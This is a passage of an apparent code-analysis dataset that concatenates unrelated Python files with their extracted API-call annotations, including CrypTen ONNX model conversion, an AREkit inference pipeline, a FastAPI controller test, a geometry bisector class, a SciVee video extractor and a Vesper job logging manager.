'(int)\n', (18191, 18196), False, 'from collections import namedtuple, defaultdict\n'), ((3107, 3174), 'sklearn.metrics.normalized_mutual_info_score', 'normalized_mutual_info_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (3135, 3174), False, 'from sklearn.metrics import normalized_mutual_info_score\n'), ((12174, 12232), 'sklearn.metrics.adjusted_rand_score', 'adjusted_rand_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (12193, 12232), False, 'from sklearn.metrics import adjusted_rand_score\n'), ((14986, 15051), 'sklearn.metrics.adjusted_mutual_info_score', 'adjusted_mutual_info_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (15012, 15051), False, 'from sklearn.metrics import adjusted_mutual_info_score\n'), ((16491, 16505), 'numpy.log2', 'np.log2', (['(r / p)'], {}), '(r / p)\n', (16498, 16505), True, 'import numpy as np\n'), ((16508, 16522), 'numpy.log2', 'np.log2', (['(r / q)'], {}), '(r / q)\n', (16515, 16522), True, 'import numpy as np\n')] |
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
result_from_expected_behavior = {
"success": isSuccess,
"failure_generic": isFailure,
"failure_not_found": Failure(NotFound()),
}
class MyController(FastAPIController):
def execute(self, expected_behavior: str) -> BoolResult:
return result_from_expected_behavior.get(expected_behavior, isSuccess)
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
return MyController().execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
"behavior,expected_status_code",
[("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
behavior, expected_status_code
):
with TestClient(app) as client:
response = client.get("/test", headers={"x-behavior": behavior})
assert_http(response, expected_status_code)
| [
"fastapi.Header",
"fastapi.FastAPI",
"fastapi.testclient.TestClient",
"pytest.mark.parametrize",
"petisco.assert_http",
"petisco.NotFound"
] | [((283, 308), 'fastapi.FastAPI', 'FastAPI', ([], {'title': '"""test-app"""'}), "(title='test-app')\n", (290, 308), False, 'from fastapi import FastAPI, Header\n'), ((784, 918), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""behavior,expected_status_code"""', "[('success', 200), ('failure_generic', 500), ('failure_not_found', 404)]"], {}), "('behavior,expected_status_code', [('success', 200),\n ('failure_generic', 500), ('failure_not_found', 404)])\n", (807, 918), False, 'import pytest\n'), ((697, 714), 'fastapi.Header', 'Header', (['"""success"""'], {}), "('success')\n", (703, 714), False, 'from fastapi import FastAPI, Header\n'), ((437, 447), 'petisco.NotFound', 'NotFound', ([], {}), '()\n', (445, 447), False, 'from petisco import NotFound, assert_http\n'), ((1041, 1056), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1051, 1056), False, 'from fastapi.testclient import TestClient\n'), ((1149, 1192), 'petisco.assert_http', 'assert_http', (['response', 'expected_status_code'], {}), '(response, expected_status_code)\n', (1160, 1192), False, 'from petisco import NotFound, assert_http\n')] |
from django.core.mail import send_mail
from component.reminder.models import Reminder
from server.celery import app
@app.task
def send_email(id):
reminder = Reminder.objects.filter(id=id).first()
if reminder is not None:
send_mail(subject="ReminderMessage",
message=reminder.text,
from_email='<EMAIL>',
recipient_list=[reminder.email]
)
| [
"django.core.mail.send_mail",
"component.reminder.models.Reminder.objects.filter"
] | [((240, 359), 'django.core.mail.send_mail', 'send_mail', ([], {'subject': '"""ReminderMessage"""', 'message': 'reminder.text', 'from_email': '"""<EMAIL>"""', 'recipient_list': '[reminder.email]'}), "(subject='ReminderMessage', message=reminder.text, from_email=\n '<EMAIL>', recipient_list=[reminder.email])\n", (249, 359), False, 'from django.core.mail import send_mail\n'), ((164, 194), 'component.reminder.models.Reminder.objects.filter', 'Reminder.objects.filter', ([], {'id': 'id'}), '(id=id)\n', (187, 194), False, 'from component.reminder.models import Reminder\n')] |
import pandas as pd
import pytest
from ..base import BaseMiner, MDLOptimizer
def test_inst_params():
class MyMiner(BaseMiner):
def __init__(self, eps=3):
self.eps = eps
self._a = 2
def fit(self, D):
self._a = 12
kwargs = dict(eps=4)
miner = MyMiner(**kwargs)
assert miner.get_params() == kwargs
kwargs.update(eps=10)
miner.set_params(**kwargs)
assert miner.get_params() == kwargs
assert miner.set_params().get_params() == kwargs # stay untouched
with pytest.raises(ValueError):
miner.set_params(random_key=2)
def test_inst_params_no_init():
class MyMiner(BaseMiner):
def fit(self, D, y=None):
return self
miner = MyMiner()
assert miner.get_params() == dict()
def test_mdl_repr():
class A(MDLOptimizer):
def __init__(self):
self.codetable_ = {1: [0, 1], 2: [1]}
def fit(self):
return self
def evaluate(self):
return True
def generate_candidates(self):
return list()
a = A()
assert isinstance(a._repr_html_(), str)
assert isinstance(a.fit()._repr_html_(), str)
| [
"pytest.raises"
] | [((548, 573), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (561, 573), False, 'import pytest\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import onnx
import torch
import torch.onnx.symbolic_helper as sym_help
import torch.onnx.symbolic_registry as sym_registry
import torch.onnx.utils
from onnx import numpy_helper
from torch.onnx import OperatorExportTypes
from . import module
try:
import tensorflow as tf # noqa
import tf2onnx
TF_AND_TF2ONNX = True
except ImportError:
TF_AND_TF2ONNX = False
def from_onnx(onnx_string_or_file):
"""
Converts an ONNX model serialized in an `onnx_string_or_file` to a CrypTen model.
"""
onnx_model = _load_onnx_model(onnx_string_or_file)
return _to_crypten(onnx_model)
def from_pytorch(pytorch_model, dummy_input):
"""
Converts a PyTorch model `pytorch_model` into a CrypTen model by tracing it
using the input `dummy_input`.
"""
# construct CrypTen model:
f = _from_pytorch_to_bytes(pytorch_model, dummy_input)
crypten_model = from_onnx(f)
f.close()
# set model architecture to export model back to pytorch model
crypten_model.pytorch_model = copy.deepcopy(pytorch_model)
# make sure training / eval setting is copied:
crypten_model.train(mode=pytorch_model.training)
return crypten_model
def from_tensorflow(tensorflow_graph_def, inputs, outputs):
"""
Function that converts Tensorflow model into CrypTen model based on
https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py
The model is returned in evaluation mode.
Args:
`tensorflow_graph_def`: Input Tensorflow GraphDef to be converted
`inputs`: input nodes
`outputs`: output nodes
"""
raise DeprecationWarning(
"crypten.nn.from_tensorflow is deprecated. ",
"CrypTen will no longer support model conversion from TensorFlow.",
)
# Exporting model to ONNX graph
if not TF_AND_TF2ONNX:
raise ImportError("Please install both tensorflow and tf2onnx packages")
with tf.Graph().as_default() as tf_graph:
tf.import_graph_def(tensorflow_graph_def, name="")
with tf2onnx.tf_loader.tf_session(graph=tf_graph):
g = tf2onnx.tfonnx.process_tf_graph(
tf_graph,
opset=10,
continue_on_error=False,
input_names=inputs,
output_names=outputs,
)
onnx_graph = tf2onnx.optimizer.optimize_graph(g)
model_proto = onnx_graph.make_model(
"converted from {}".format(tensorflow_graph_def)
)
f = io.BytesIO()
f.write(model_proto.SerializeToString())
# construct CrypTen model
# Note: We don't convert crypten model to training mode, as Tensorflow
# models are used for both training and evaluation without the specific
# conversion of one mode to another
f.seek(0)
crypten_model = from_onnx(f)
return crypten_model
def _from_pytorch_to_bytes(pytorch_model, dummy_input):
"""
Returns I/O stream containing ONNX graph for `pytorch_model` traced with
input `dummy_input`.
"""
# first export is only used to obtain the PyTorch-to-ONNX symbolic registry:
with io.BytesIO() as f:
_export_pytorch_model(f, pytorch_model, dummy_input)
# update ONNX symbolic registry with CrypTen-specific functions:
_update_onnx_symbolic_registry()
# export again so the graph is created with CrypTen-specific registry:
f = io.BytesIO()
f = _export_pytorch_model(f, pytorch_model, dummy_input)
f.seek(0)
return f
def _export_pytorch_model(f, pytorch_model, dummy_input):
"""
Returns a binary I/O stream containing ONNX-exported pytorch_model that was
traced with input `dummy_input`.
"""
kwargs = {
"do_constant_folding": False,
"export_params": True,
"enable_onnx_checker": True,
"input_names": ["input"],
"operator_export_type": OperatorExportTypes.ONNX,
"output_names": ["output"],
}
torch.onnx.export(pytorch_model, dummy_input, f, **kwargs)
return f
# mapping from ONNX to crypten.nn for modules with different names:
ONNX_TO_CRYPTEN = {
"adaptive_avg_pool2d": module.AdaptiveAvgPool2d,
"adaptive_max_pool2d": module.AdaptiveMaxPool2d,
"AveragePool": module.AvgPool2d,
"Clip": module.Hardtanh,
"MaxPool": module.MaxPool2d,
"Pad": module._ConstantPad,
"Relu": module.ReLU,
"ReduceMean": module.Mean,
"ReduceSum": module.Sum,
}
def _to_crypten(onnx_model):
"""
Function that converts an `onnx_model` to a CrypTen model.
"""
# create graph:
input_names, output_names = _get_input_output_names(onnx_model)
assert len(output_names) == 1, "Only one output per model supported."
crypten_model = module.Graph(input_names, output_names[0])
# create nodes for the parameters:
for node in onnx_model.graph.initializer:
param = torch.from_numpy(numpy_helper.to_array(node))
crypten_model.add_module(node.name, module.Parameter(param), [])
# loop over all nodes:
for node in onnx_model.graph.node:
# get attributes and node type:
attributes = {attr.name: _get_attribute_value(attr) for attr in node.attribute}
crypten_class = _get_operator_class(node.op_type, attributes)
# add CrypTen module to graph:
crypten_module = crypten_class.from_onnx(attributes=attributes)
input_names = list(node.input)
output_names = list(node.output)
if node.op_type == "Dropout":
output_names = [output_names[0]] # do not output Dropout mask
crypten_model.add_module(
output_names[0], crypten_module, input_names, output_names=output_names
)
# return final model:
crypten_model = _get_model_or_module(crypten_model)
return crypten_model
def _load_onnx_model(onnx_string_or_file):
"""
Loads ONNX model from file or string.
"""
if hasattr(onnx_string_or_file, "seek"):
onnx_string_or_file.seek(0)
return onnx.load(onnx_string_or_file)
return onnx.load_model_from_string(onnx_string_or_file)
def _get_input_output_names(onnx_model):
"""
Return input and output names of the ONNX graph.
"""
input_names = [input.name for input in onnx_model.graph.input]
output_names = [output.name for output in onnx_model.graph.output]
assert len(input_names) >= 1, "number of inputs should be at least 1"
assert len(output_names) == 1, "number of outputs should be 1"
return input_names, output_names
def _get_model_or_module(crypten_model):
"""
Returns `Module` if model contains only one module. Otherwise returns model.
"""
num_modules = len(list(crypten_model.modules()))
if num_modules == 1:
for crypten_module in crypten_model.modules():
return crypten_module
return crypten_model
def _get_attribute_value(attr):
"""
Retrieves value from an ONNX attribute.
"""
if attr.HasField("f"): # floating-point attribute
return attr.f
elif attr.HasField("i"): # integer attribute
return attr.i
elif attr.HasField("s"): # string attribute
return attr.s # TODO: Sanitize string.
elif attr.HasField("t"): # tensor attribute
return torch.from_numpy(numpy_helper.to_array(attr.t))
elif len(attr.ints) > 0:
return list(attr.ints)
elif len(attr.floats) > 0:
return list(attr.floats)
raise ValueError("Unknown attribute type for attribute %s." % attr.name)
def _get_operator_class(node_op_type, attributes):
"""
Returns the `crypten.nn.Module` type corresponding to an ONNX node.
"""
crypten_class = getattr(
module, node_op_type, ONNX_TO_CRYPTEN.get(node_op_type, None)
)
if crypten_class is None:
raise ValueError(f"CrypTen does not support ONNX op {node_op_type}.")
return crypten_class
def _update_onnx_symbolic_registry():
"""
Updates the ONNX symbolic registry for operators that need a CrypTen-specific
implementation and custom operators.
"""
# update PyTorch's symbolic ONNX registry to output different functions:
for version_key, version_val in sym_registry._registry.items():
for function_key in version_val.keys():
if function_key == "softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_softmax
if function_key == "log_softmax":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_logsoftmax
if function_key == "dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_dropout
if function_key == "feature_dropout":
sym_registry._registry[version_key][
function_key
] = _onnx_crypten_feature_dropout
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_softmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's Softmax module to a Softmax module in
the ONNX model. It overrides PyTorch's default conversion of Softmax module
to a sequence of Exp, ReduceSum and Div modules, since this default
conversion can cause numerical overflow when applied to CrypTensors.
"""
result = g.op("Softmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_logsoftmax(g, input, dim, dtype=None):
"""
This function converts PyTorch's LogSoftmax module to a LogSoftmax module in
the ONNX model. It overrides PyTorch's default conversion of LogSoftmax module
to avoid potentially creating Transpose operators.
"""
result = g.op("LogSoftmax", input, axis_i=dim)
if dtype and dtype.node().kind() != "prim::Constant":
parsed_dtype = sym_help._get_const(dtype, "i", "dtype")
result = g.op("Cast", result, to_i=sym_help.scalar_type_to_onnx[parsed_dtype])
return result
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_dropout(g, input, p, train):
"""
This function converts PyTorch's Dropout module to a Dropout module in the ONNX
model. It overrides PyTorch's default implementation to ignore the Dropout module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore Dropout modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the Dropout module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("Dropout", input, ratio_f=p, outputs=2)
return r
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_feature_dropout(g, input, p, train):
"""
This function converts PyTorch's DropoutNd module to a DropoutNd module in the ONNX
model. It overrides PyTorch's default implementation to ignore the DropoutNd module
during the conversion. PyTorch assumes that ONNX models are only used for
inference and therefore DropoutNd modules are not required in the ONNX model.
However, CrypTen needs to convert ONNX models to trainable
CrypTen models, and so the DropoutNd module needs to be included in the
CrypTen-specific conversion.
"""
r, _ = g.op("DropoutNd", input, ratio_f=p, outputs=2)
return r
| [
"torch.onnx.symbolic_helper.parse_args",
"tensorflow.Graph",
"torch.onnx.symbolic_helper._get_const",
"io.BytesIO",
"torch.onnx.symbolic_registry._registry.items",
"tf2onnx.tf_loader.tf_session",
"tf2onnx.optimizer.optimize_graph",
"onnx.load_model_from_string",
"onnx.load",
"tensorflow.import_gra... | [((9120, 9157), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""i"""', '"""none"""'], {}), "('v', 'i', 'none')\n", (9139, 9157), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((9806, 9843), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""i"""', '"""none"""'], {}), "('v', 'i', 'none')\n", (9825, 9843), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((10417, 10451), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""f"""', '"""i"""'], {}), "('v', 'f', 'i')\n", (10436, 10451), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((11085, 11119), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""f"""', '"""i"""'], {}), "('v', 'f', 'i')\n", (11104, 11119), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((1252, 1280), 'copy.deepcopy', 'copy.deepcopy', (['pytorch_model'], {}), '(pytorch_model)\n', (1265, 1280), False, 'import copy\n'), ((2518, 2553), 'tf2onnx.optimizer.optimize_graph', 'tf2onnx.optimizer.optimize_graph', (['g'], {}), '(g)\n', (2550, 2553), False, 'import tf2onnx\n'), ((2666, 2678), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (2676, 2678), False, 'import io\n'), ((3556, 3568), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (3566, 3568), False, 'import io\n'), ((4109, 4167), 'torch.onnx.export', 'torch.onnx.export', (['pytorch_model', 'dummy_input', 'f'], {}), '(pytorch_model, dummy_input, f, **kwargs)\n', (4126, 4167), False, 'import torch\n'), ((6200, 6248), 'onnx.load_model_from_string', 'onnx.load_model_from_string', (['onnx_string_or_file'], {}), '(onnx_string_or_file)\n', (6227, 6248), False, 'import onnx\n'), ((8334, 8364), 'torch.onnx.symbolic_registry._registry.items', 'sym_registry._registry.items', ([], {}), '()\n', (8362, 8364), True, 'import torch.onnx.symbolic_registry as sym_registry\n'), ((2193, 2243), 'tensorflow.import_graph_def', 'tf.import_graph_def', (['tensorflow_graph_def'], {'name': '""""""'}), "(tensorflow_graph_def, name='')\n", (2212, 2243), True, 'import tensorflow as tf\n'), ((2253, 2297), 'tf2onnx.tf_loader.tf_session', 'tf2onnx.tf_loader.tf_session', ([], {'graph': 'tf_graph'}), '(graph=tf_graph)\n', (2281, 2297), False, 'import tf2onnx\n'), ((2311, 2433), 'tf2onnx.tfonnx.process_tf_graph', 'tf2onnx.tfonnx.process_tf_graph', (['tf_graph'], {'opset': '(10)', 'continue_on_error': '(False)', 'input_names': 'inputs', 'output_names': 'outputs'}), '(tf_graph, opset=10, continue_on_error=False,\n input_names=inputs, output_names=outputs)\n', (2342, 2433), False, 'import tf2onnx\n'), ((3285, 3297), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (3295, 3297), False, 'import io\n'), ((6158, 6188), 'onnx.load', 'onnx.load', (['onnx_string_or_file'], {}), '(onnx_string_or_file)\n', (6167, 6188), False, 'import onnx\n'), ((9657, 9697), 'torch.onnx.symbolic_helper._get_const', 'sym_help._get_const', (['dtype', '"""i"""', '"""dtype"""'], {}), "(dtype, 'i', 'dtype')\n", (9676, 9697), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((10268, 10308), 'torch.onnx.symbolic_helper._get_const', 'sym_help._get_const', (['dtype', '"""i"""', '"""dtype"""'], {}), "(dtype, 'i', 'dtype')\n", (10287, 10308), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((5050, 5077), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['node'], {}), '(node)\n', (5071, 5077), False, 'from onnx import numpy_helper\n'), ((2148, 2158), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2156, 2158), True, 'import tensorflow as tf\n'), ((7430, 7459), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['attr.t'], {}), '(attr.t)\n', (7451, 7459), False, 'from onnx import numpy_helper\n')] |
from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider
from arekit.common.data.row_ids.multiple import MultipleIDProvider
from arekit.common.data.storages.base import BaseRowsStorage
from arekit.common.data.views.samples import BaseSampleStorageView
from arekit.common.experiment.data_type import DataType
from arekit.common.labels.scaler import BaseLabelScaler
from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler
from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN
from arekit.contrib.networks.context.configurations.cnn import CNNConfig
from arekit.contrib.networks.core.ctx_inference import InferenceContext
from arekit.contrib.networks.core.feeding.bags.collection.single import SingleBagsCollection
from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper
from arekit.contrib.networks.core.model import BaseTensorflowModel
from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO
from arekit.contrib.networks.core.predict.provider import BasePredictProvider
from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter
from arekit.contrib.networks.shapes import NetworkInputShapes
from examples.input import EXAMPLES
from examples.repository import pipeline_serialize
def pipeline_infer(labels_scaler):
assert(isinstance(labels_scaler, BaseLabelScaler))
# Step 4. Deserialize data
network = PiecewiseCNN()
config = CNNConfig()
config.set_term_embedding(EmbeddingHelper.load_vocab("embedding.txt"))
inference_ctx = InferenceContext.create_empty()
inference_ctx.initialize(
dtypes=[DataType.Test],
create_samples_view_func=lambda data_type: BaseSampleStorageView(
storage=BaseRowsStorage.from_tsv("samples.txt"),
row_ids_provider=MultipleIDProvider()),
has_model_predefined_state=True,
vocab=EmbeddingHelper.load_vocab("vocab.txt"),
labels_count=3,
input_shapes=NetworkInputShapes(iter_pairs=[
(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext),
(NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext),
(NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext),
]),
bag_size=config.BagSize)
# Step 5. Model preparation.
model = BaseTensorflowModel(
nn_io=NeuralNetworkModelIO(
target_dir=".model",
full_model_name="PCNN",
model_name_tag="_"),
network=network,
config=config,
inference_ctx=inference_ctx,
bags_collection_type=SingleBagsCollection, # Используем на вход 1 пример.
)
model.predict()
# Step 6. Gather annotated contexts onto document level.
labeled_samples = model.get_labeled_samples_collection(data_type=DataType.Test)
predict_provider = BasePredictProvider()
# TODO. For now it is limited to tsv.
with TsvPredictWriter(filepath="out.txt") as out:
title, contents_it = predict_provider.provide(
sample_id_with_uint_labels_iter=labeled_samples.iter_non_duplicated_labeled_sample_row_ids(),
labels_scaler=labels_scaler)
out.write(title=title,
contents_it=contents_it)
if __name__ == '__main__':
text = EXAMPLES["simple"]
labels_scaler = ThreeLabelScaler()
label_provider = MultipleLabelProvider(label_scaler=labels_scaler)
pipeline_serialize(sentences_text_list=text, label_provider=label_provider)
pipeline_infer(labels_scaler)
| [
"arekit.contrib.networks.core.ctx_inference.InferenceContext.create_empty",
"examples.repository.pipeline_serialize",
"arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab",
"arekit.contrib.networks.core.predict.tsv_writer.TsvPredictWriter",
"arekit.contrib.experiment_rusentrel.lab... | [((1454, 1468), 'arekit.contrib.networks.context.architectures.pcnn.PiecewiseCNN', 'PiecewiseCNN', ([], {}), '()\n', (1466, 1468), False, 'from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN\n'), ((1482, 1493), 'arekit.contrib.networks.context.configurations.cnn.CNNConfig', 'CNNConfig', ([], {}), '()\n', (1491, 1493), False, 'from arekit.contrib.networks.context.configurations.cnn import CNNConfig\n'), ((1591, 1622), 'arekit.contrib.networks.core.ctx_inference.InferenceContext.create_empty', 'InferenceContext.create_empty', ([], {}), '()\n', (1620, 1622), False, 'from arekit.contrib.networks.core.ctx_inference import InferenceContext\n'), ((2900, 2921), 'arekit.contrib.networks.core.predict.provider.BasePredictProvider', 'BasePredictProvider', ([], {}), '()\n', (2919, 2921), False, 'from arekit.contrib.networks.core.predict.provider import BasePredictProvider\n'), ((3377, 3395), 'arekit.contrib.experiment_rusentrel.labels.scalers.three.ThreeLabelScaler', 'ThreeLabelScaler', ([], {}), '()\n', (3393, 3395), False, 'from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler\n'), ((3417, 3466), 'arekit.common.data.input.providers.label.multiple.MultipleLabelProvider', 'MultipleLabelProvider', ([], {'label_scaler': 'labels_scaler'}), '(label_scaler=labels_scaler)\n', (3438, 3466), False, 'from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider\n'), ((3472, 3547), 'examples.repository.pipeline_serialize', 'pipeline_serialize', ([], {'sentences_text_list': 'text', 'label_provider': 'label_provider'}), '(sentences_text_list=text, label_provider=label_provider)\n', (3490, 3547), False, 'from examples.repository import pipeline_serialize\n'), ((1525, 1568), 'arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab', 'EmbeddingHelper.load_vocab', (['"""embedding.txt"""'], {}), "('embedding.txt')\n", (1551, 1568), False, 'from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper\n'), ((2974, 3010), 'arekit.contrib.networks.core.predict.tsv_writer.TsvPredictWriter', 'TsvPredictWriter', ([], {'filepath': '"""out.txt"""'}), "(filepath='out.txt')\n", (2990, 3010), False, 'from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter\n'), ((1927, 1966), 'arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab', 'EmbeddingHelper.load_vocab', (['"""vocab.txt"""'], {}), "('vocab.txt')\n", (1953, 1966), False, 'from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper\n'), ((2013, 2258), 'arekit.contrib.networks.shapes.NetworkInputShapes', 'NetworkInputShapes', ([], {'iter_pairs': '[(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext), (\n NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext), (\n NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext)]'}), '(iter_pairs=[(NetworkInputShapes.FRAMES_PER_CONTEXT,\n config.FramesPerContext), (NetworkInputShapes.TERMS_PER_CONTEXT, config\n .TermsPerContext), (NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.\n SynonymsPerContext)])\n', (2031, 2258), False, 'from arekit.contrib.networks.shapes import NetworkInputShapes\n'), ((2407, 2496), 'arekit.contrib.networks.core.model_io.NeuralNetworkModelIO', 'NeuralNetworkModelIO', ([], {'target_dir': '""".model"""', 'full_model_name': '"""PCNN"""', 'model_name_tag': '"""_"""'}), "(target_dir='.model', full_model_name='PCNN',\n model_name_tag='_')\n", (2427, 2496), False, 'from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO\n'), ((1779, 1818), 'arekit.common.data.storages.base.BaseRowsStorage.from_tsv', 'BaseRowsStorage.from_tsv', (['"""samples.txt"""'], {}), "('samples.txt')\n", (1803, 1818), False, 'from arekit.common.data.storages.base import BaseRowsStorage\n'), ((1849, 1869), 'arekit.common.data.row_ids.multiple.MultipleIDProvider', 'MultipleIDProvider', ([], {}), '()\n', (1867, 1869), False, 'from arekit.common.data.row_ids.multiple import MultipleIDProvider\n')] |
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
def __init__(self, item):
"""Construct Bisector."""
Point.__init__(self, item)
self.item["sub_type"] = c.Point.Definition.BISECTOR
def tikzify(self):
return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (self.item["definition"]["A"],
self.item["definition"]["B"],
self.item["definition"]["C"],
self.get_id())
def recompute_canvas(self, items, window, width, height):
A = items[self.depends_on()[0]].get_canvas_coordinates()
B = items[self.depends_on()[1]].get_canvas_coordinates()
C = items[self.depends_on()[2]].get_canvas_coordinates()
self.set_canvas_coordinates(*bisector_point(A, B, C))
def __str__(self):
return "Bisector point (%s) of angle %s"\
% (self.item["id"], self.item["definition"]["A"]+self.item["definition"]["B"]+self.item["definition"]["C"])
def definition_builder(self, data, items=None):
if len(data) == 3:
return dict(zip(["A", "B", "C"], data))
def parse_into_definition(self, arguments, items):
# arguments length condition
if len(arguments) != 3:
return None
# all arguments are members of the regular expression for argument name
if not all(map(lambda x: self.name_pattern(x), arguments)):
return None
# all arguments are items that already exist
if not all(map(lambda x: x in items, arguments)):
return None
# the type of all arguments is of a certain type
if not all(map(lambda x: items[x].item["type"] == 'point', arguments)):
return None
# self-reference condition (self-reference is not permitted)
if self.get_id() in arguments:
return None
# condition for cross reference
for id in arguments:
deep_depends = items[id].deep_depends_on(items)
if self.get_id() in deep_depends:
return None
return self.definition_builder(arguments)
@staticmethod
def static_patterns():
return ["ppp"]
def patterns(self):
return ["ppp"]
| [
"Point.Point.__init__",
"GeometryMath.bisector_point"
] | [((182, 208), 'Point.Point.__init__', 'Point.__init__', (['self', 'item'], {}), '(self, item)\n', (196, 208), False, 'from Point import Point\n'), ((973, 996), 'GeometryMath.bisector_point', 'bisector_point', (['A', 'B', 'C'], {}), '(A, B, C)\n', (987, 996), False, 'from GeometryMath import bisector_point\n')] |
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class SciVeeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?scivee\.tv/node/(?P<id>\d+)'
_TEST = {
'url': 'http://www.scivee.tv/node/62352',
'md5': 'b16699b74c9e6a120f6772a44960304f',
'info_dict': {
'id': '62352',
'ext': 'mp4',
'title': '<NAME> at the 2014 DOE JGI Genomics of Energy & Environment Meeting',
'description': 'md5:81f1710638e11a481358fab1b11059d7',
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
# annotations XML is malformed
annotations = self._download_webpage(
'http://www.scivee.tv/assets/annotations/%s' % video_id, video_id, 'Downloading annotations')
title = self._html_search_regex(r'<title>([^<]+)</title>', annotations, 'title')
description = self._html_search_regex(r'<abstract>([^<]+)</abstract>', annotations, 'abstract', fatal=False)
filesize = int_or_none(self._html_search_regex(
r'<filesize>([^<]+)</filesize>', annotations, 'filesize', fatal=False))
formats = [
{
'url': 'http://www.scivee.tv/assets/audio/%s' % video_id,
'ext': 'mp3',
'format_id': 'audio',
},
{
'url': 'http://www.scivee.tv/assets/video/%s' % video_id,
'ext': 'mp4',
'format_id': 'video',
'filesize': filesize,
},
]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': 'http://www.scivee.tv/assets/videothumb/%s' % video_id,
'formats': formats,
}
| [
"re.match"
] | [((636, 666), 're.match', 're.match', (['self._VALID_URL', 'url'], {}), '(self._VALID_URL, url)\n', (644, 666), False, 'import re\n')] |
"""Module containing class `JobLoggingManager`."""
from collections import defaultdict
from logging import FileHandler, Handler
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
import logging
import vesper.util.logging_utils as logging_utils
import vesper.util.os_utils as os_utils
# TODO: Add record count fields to the `Job` model class, and modify
# the record counts handler to update the fields both while a job is
# running and upon completion.
class _RecordCountsHandler(Handler):
def __init__(self):
super().__init__()
self.record_counts = defaultdict(int)
def emit(self, record):
self.record_counts[record.levelno] += 1
class JobLoggingManager:
"""
Manages logging for a Vesper job.
A `JobLoggingManager` manages logging for the processes of a Vesper job.
Log records can be submitted by any process of a job using any logger
(typically the root logger) configured with the `configure_logger`
static method. A logger so configured writes each log record to a
multiprocessing queue that is read by a thread running in the main
